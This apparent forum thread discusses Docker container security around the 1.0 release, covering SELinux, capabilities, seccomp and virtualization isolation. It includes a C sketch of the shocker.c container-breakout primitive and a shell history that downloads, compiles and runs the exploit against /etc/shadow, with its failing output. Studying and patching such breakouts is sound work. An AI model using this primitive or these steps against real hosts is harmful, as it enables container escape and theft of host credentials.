Please remember that at this time, we don't claim Docker out-of-the-box is suitable for containing untrusted programs with root privileges. So if you're thinking "phew, good thing we upgraded to 1.0 or we were toast", you need to change your underlying configuration now. Add AppArmor or SELinux containment, map trust groups to separate machines, or ideally don't grant root access to the application.
Docker will soon support user namespaces, which is a great additional security layer but also not a silver bullet!
When we feel comfortable saying that Docker out-of-the-box can safely contain untrusted uid0 programs, we will say so clearly.
Docker is awesome by the way.
"..., or ideally don't grant root access to the application."
Nothing with a shared kernel is going to be very secure. That's just the nature of the beast. It's why Docker supports SELinux. It's why RHEL and CentOS ship with pre-written SELinux policy for common daemons.
If you intend to have more than zero services on the system, you want SELinux.
Is running something inside Docker worse than running the same application on the host, from a security point of view?
If not then you can consider docker just as one way of deploying an application on the host, i.e. not something for shared hosting of independent/possibly malicious applications.
Not if you're running Windows.
Not if Windows puts money in your pocket.
Xen would be cheaper and give us better utilisation but getting rid of VMware was a good step towards cost savings :)
The syntax for the transition rules on the other hand looks like someone disgorged C-struct assignments on paper and left them there. So while SELinux (the system) is quite easily understood, the rules used to build SELinux systems are frightening, large, and from first appearance, very, very complex.
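For flavor, here's the shape of two typical rules, with identifiers as you'd find them in the reference policy (illustrative, not a complete module):

    allow httpd_t httpd_sys_content_t : file { read getattr open };
    type_transition httpd_t httpd_sys_script_exec_t : process httpd_sys_script_t;

The first grants the web-server domain read access to files labeled as web content; the second says that when httpd_t executes a file labeled httpd_sys_script_exec_t, the new process runs in the httpd_sys_script_t domain.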
(disclosure: I had the privilege of going through SELinux a few years ago when Nokia considered using it as part of their Maemo platform security. The engineering effort was eventually deemed too large and the benefit too little, so it was skipped as infeasible. Less than two years later, Google announced that they would be taking on the task with their SE-Android project.)
I trust SELinux. I don't necessarily trust my understanding of SELinux...it is a complicated beast. But, I believe that when configured correctly, it is a very powerful tool.
As I understand it, SELinux covers more ground than AppArmor. I have low familiarity with AppArmor, however, so don't know enough to argue why one might choose one over the other. But, I don't have any suspicion of SELinux containing exploitable code inserted by the NSA.
Instead of writing thousands of lines of policy from scratch, even a very complex system configuration might require a one-liner tweak to the Red Hat-provided policy.
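One well-known example of such a one-liner (a boolean toggle rather than hand-written policy; the boolean name here is from the RHEL targeted policy) is letting Apache make outbound network connections:

    setsebool -P httpd_can_network_connect 1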
SELinux is still operating in a shared kernel.
It's fixed in Docker 1.0, since CAP_DAC_READ_SEARCH is no longer available.
Other FS-related threats to container-based VMMs that have been discussed:
- subvolume-related FS operations (snapshots etc.)
- FS ioctls that accept FS handles as well (XFS)
- CAP_DAC_READ_SEARCH also defeats chroot and other bind-mount containers (privileged LXC)
- CAP_MKNOD might be a problem too (still available in Docker 1.0) depending on the drivers available in the kernel
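To make the CAP_DAC_READ_SEARCH point concrete, here is a stripped-down sketch of the core primitive in shocker.c. Assumptions: an ext4 host filesystem and a hand-picked handle; the real exploit brute-forces handles, starting from a file bind-mounted from the host such as /.dockerinit.

    /* minimal sketch of the shocker.c primitive: with CAP_DAC_READ_SEARCH,
     * open_by_handle_at() opens a host inode directly by handle, bypassing
     * the container's mount namespace entirely */
    #define _GNU_SOURCE
    #include <fcntl.h>
    #include <stdio.h>
    #include <unistd.h>

    /* fixed-size stand-in for struct file_handle, as in shocker.c */
    struct my_file_handle {
        unsigned int handle_bytes;
        int handle_type;
        unsigned char f_handle[8];
    };

    int main(void)
    {
        /* ext4 handles are a 32-bit inode plus a 32-bit generation;
         * inode 2 is the root directory, and we guess generation 0 */
        struct my_file_handle fh = { .handle_bytes = 8, .handle_type = 1,
                                     .f_handle = { 2 } };
        /* any open fd on the target filesystem works as the mount hint */
        int mnt_fd = open("/", O_RDONLY);

        int fd = open_by_handle_at(mnt_fd, (struct file_handle *)&fh, O_RDONLY);
        if (fd < 0)
            perror("[-] open_by_handle_at");  /* EPERM without the capability */
        else
            printf("[+] opened a host inode by raw handle (fd=%d)\n", fd);
        return 0;
    }

Without CAP_DAC_READ_SEARCH the call fails with "Operation not permitted", which is exactly what the transcript below shows on Docker 1.0.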
    10 wget http://stealth.openwall.net/xSports/shocker.c
    11 cc -Wall -std=c99 -O2 shocker.c -static
    12 apt-get install build-essential
    13 cc -Wall -std=c99 -O2 shocker.c -static
    14 cc -Wall -std=c99 -O2 shocker.c -static -Wno-unused-result
    18 nano a.out
    19 cat a.out
    [***] docker VMM-container breakout Po(C) 2014 [***]
    [***] The tea from the 90's kicks your sekurity again. [***]
    [***] If you have pending sec consulting, I'll happily [***]
    [***] forward to my friends who drink secury-tea too! [***]
    [*] Resolving 'etc/shadow'
    [-] open_by_handle_at: Operation not permitted
    root@377a6f4ab0a4:/# uname -r
While the issue is currently fixed in the 0.12 and 1.0 releases, I doubt Docker is completely bulletproof.
It's a wonderful quote, by the way; I really like it, and it mirrors my reservations about some people's use of virtualization.
Virtualization is perfectly fine for hardware utilization, ease of deployment, and so on. Just don't rely on it for additional security, because that's not what it's there for.
No virtualization developer is under the impression that it's magical or bulletproof.
You rely on the operating system's security mechanisms continuously, and developers work hard to fix bugs and vulnerabilities when they appear. Same goes for virtualization -- the security semantics are just different.
Developers: No, of course not. Some users, however, assume that you're automatically safe because you run VMware/Xen/Hyper-V or whatever.
People forget that in-chip memory protection didn't come about for security reasons: memory errors were a particularly dangerous and particularly common kind of bug, and the hardware was extended to help with memory isolation. Memory errors that take down the whole OS session have been almost unheard of since operating systems started fully utilizing the on-chip protection. Programmers didn't become "superhuman" at preventing these errors.
For similar reasons it's much easier for hardware-backed virtualization programmers to protect you from malicious business inside a VM than it is for OS or container programmers.
The real truth is that the difficulty of containment is proportional to the interface that is available to the contained process. You don't need VM or hypervisor technology to build a virtually unbreakable container. You only need to prevent the contained process from using any syscalls at all.
Hardware only seems better at this kind of stuff because (a) it's harder to find errata in hardware and (b) the syscall interfaces of commonly used operating systems are much larger than what the hardware offers, and were developed without keeping containability in mind. It is a well known fact that tacking on security features in hindsight is problematic.
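On Linux there is in fact a primitive for exactly that "no syscalls at all" container: seccomp strict mode. A minimal sketch; after the prctl() call the process keeps only read(), write(), _exit() and sigreturn(), and any other syscall is answered with SIGKILL:

    #define _GNU_SOURCE
    #include <unistd.h>
    #include <sys/prctl.h>
    #include <sys/syscall.h>
    #include <linux/seccomp.h>

    int main(void)
    {
        if (prctl(PR_SET_SECCOMP, SECCOMP_MODE_STRICT) != 0)
            return 1;  /* kernel lacks seccomp; we are not sandboxed */

        /* still allowed: write() on an already-open fd */
        write(STDOUT_FILENO, "sandboxed\n", 10);

        /* open(), socket(), even libc's exit() (it calls exit_group)
         * would now get SIGKILL, so leave via the raw exit syscall,
         * one of the four whitelisted calls */
        syscall(SYS_exit, 0);
        return 0;  /* not reached */
    }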
You can't just argue away the fact that a certain class of error has been all but eliminated by hardware-supported virtual memory. Multi-tasking as we know it today would basically be impossible without it. The reliability of "just get it right" systems like the early Macintosh isn't even comparable to, for example, a modern Linux machine that uses the chip to trap large classes of erroneous memory accesses.
Given that we have the above, a case of a class of error that programmers seemed unable to eliminate (practically) eliminated, I'm not really sure what you're arguing. Are you saying that hardware designers of the 80's were superhuman?
Okay... maybe Jay Miner...
You don't need hardware to eliminate memory errors: software can do it as well. Two examples of this are the Singularity system that Microsoft Research built and Google's NaCl, where the system only loads code that can be verified not to access memory incorrectly.
Your claim that hardware is easier to analyze is also incorrect. Modern processors are extremely complex beasts and are not inherently simpler than software. All processors have long lists of errata. You may be misled into thinking hardware is easier to secure because (a) those errata are less visible to userspace developers, since the kernel shields you from them, and (b) hardware developers invest much more in formal verification than software developers, out of necessity (you can't just patch silicon). If software developers invested a similar amount of effort into formal verification tools, your impression would be rather different.
Again, the point is that there is no inherent distinction between software and hardware when it comes to securing systems. It is always and everywhere first a question of how you design your systems and interfaces and second a question of investment in development effort targeted at eliminating bugs.
Okay, now I see where you're coming from. Theoretically I agree. However, practically there are a number of things that make hardware different:
* Hardware has inherent "buy-in". The software systems you describe as also solving the memory access problem are basically opt-in frameworks. While you can make software frameworks hard to opt out of (e.g., via OS integration), by definition software runs on hardware.
* Hardware solutions are often much more transparent. Again, your software examples require a great deal of re-tooling. One of the most elegant aspects of the classic 80's memory access solution was how transparent it was.
* There are far fewer hardware vendors than software vendors. Combine this with the fact that, as you point out, hardware is so expensive to retool, and you create an environment where it is much more likely that a single hardware solution will be "correct enough" to enforce a constraint on software than that the majority of software will properly opt in to a framework or code correctly.
At this point I want to ask how we're defining "super-human." What level of reliability is considered to have "super-human" requirements? There are certainly very simple and clear ways that one product produced by normal humans is much more reliable than another. For example, if you admonished someone to wear their seat belt while driving, you would scoff if they replied "well then I'm just relying on seat belt designers being super-human."
It's also worth keeping in mind that modern processors are actually extremely complex and that they do regularly have errata, even though chip designers are extremely conservative in their approach by necessity (you can't just patch silicon) and are much more thorough and disciplined in their use of formal verification tools than the vast majority of software designers.
The key really is: "Don't rely on virtualization for security".
"Containers" are just user-accessible support tooling to get creative with how those interfaces work. It really should be much easier to make container software than the entire virtualization infrastructure from scratch, in the same way that it's easier to write tar than a filesystem driver.
But when you consider the air gap, and the physical security surrounding it (12 inches of plate steel, a 5-man team with guns, a massive main gun), it's pretty secure.
I write software that runs on tanks
Ha! Only on HN...
So it probably isn't steel in large quantities, just armor as effective as 300mm of RHA.
Basically, Docker used to have a "drop" list associated with each execdriver. By default Docker kept all kernel-bestowed capabilities but would explicitly drop those on the execdriver's drop list. This created compatibility issues: if an image was prepared on a kernel that didn't have a particular capability at all and was suddenly run on one that did, weird, hard-to-diagnose behavioral differences could emerge. So now Docker drops everything by default and the execdrivers have a "keep" list. Also, there's now a check that the kernel defines a capability before trying to mess with it.
There are, of course, still some issues. For example, Docker drops everything and then tries to add capabilities back. That won't work for some capabilities, because some can't be added back once they've been renounced. Still, the situation is an interesting example of how a security bug is still a bug and is likely to bite you in some way sooner or later. See also XSS flaws that limit valid inputs.
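Here's a sketch of the keep-list approach described above (not Docker's actual code; requires CAP_SETPCAP, and the keep list is hypothetical). It also shows why "drop everything, add back later" can't work for the bounding set: PR_CAPBSET_DROP is one-way.

    #define _GNU_SOURCE
    #include <errno.h>
    #include <stdio.h>
    #include <sys/prctl.h>
    #include <linux/capability.h>

    /* hypothetical keep list; everything else gets dropped */
    static const int keep[] = { CAP_CHOWN, CAP_SETUID, CAP_SETGID,
                                CAP_NET_BIND_SERVICE };

    static int keep_cap(int cap)
    {
        for (unsigned i = 0; i < sizeof(keep) / sizeof(keep[0]); i++)
            if (keep[i] == cap)
                return 1;
        return 0;
    }

    int main(void)
    {
        for (int cap = 0; ; cap++) {
            /* probe first: PR_CAPBSET_READ fails with EINVAL once we pass
             * the last capability this kernel defines, which is the "does
             * the kernel know this cap?" check mentioned above */
            if (prctl(PR_CAPBSET_READ, cap) < 0 && errno == EINVAL)
                break;
            /* a drop from the bounding set is permanent for this process
             * and all of its descendants */
            if (!keep_cap(cap) && prctl(PR_CAPBSET_DROP, cap) < 0)
                perror("PR_CAPBSET_DROP");
        }
        return 0;
    }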
Of course! If my comment could be taken as part of the mass of prose that can be read to imply otherwise, I apologize. I don't want to undermine what Docker has done with providing a packaging format, UX, and history niceness. I also don't want to undermine the years of hard work that's gone into kernel namespacing etc. that makes it all possible.
I studied SELinux policies in depth back in 2000 or so, but have never once deployed a custom policy. I suspect others are the same. Common daemons on common distributions have recently (~the last 5 years) gained usable pre-supplied policies; unfortunately, standard services are so commodified these days that they're often outsourced (email, chat, web, etc.), so the benefits of this too-little-too-late development are partly lost in practice.
There have been a few releases since 0.11, notably 0.11.1, 0.12, and now 1.0. Can anyone confirm whether this works on the later versions of Docker?
As an employee of Docker, I feel it is more important for me to know whether we can break out, and to patch those issues, than to write viable exploits for them.
I have noticed that newer kernels and Docker versions (such as 1.0) are currently more difficult to break out of than they were in earlier versions. Again, however, it's highly dependent on the pairing.
What's important to recognize here is that even with breakout potential, containers add a useful layer of security that wouldn't otherwise exist. Containers should never remove security from your system; they should only add to it. Deployers may, however, find that removing virtual machines weakens their security story. The "secure all the things" approach would be to put QEMU in a container, then run containers inside the VM.
Otherwise, security practices are as they always have been: Don't leave setuid binaries floating around, etc.
To fix this you can shut down the container, edit the config in /var/lib/lxc/<name>/config, and add dac_read_search to lxc.cap.drop. Voila.
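That is, something like the following line in the container's config (<name> being your container's name, keeping any existing lxc.cap.drop entries as they are):

    # /var/lib/lxc/<name>/config
    lxc.cap.drop = dac_read_search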
    [*] Resolving 'etc/shadow'
    [-] open_by_handle_at: Operation not permitted
Remember to always audit the source code before running something like this. Origin repo is here:
It has been used effectively in the past! I'd encourage anyone who is researching security and Docker to send new information here.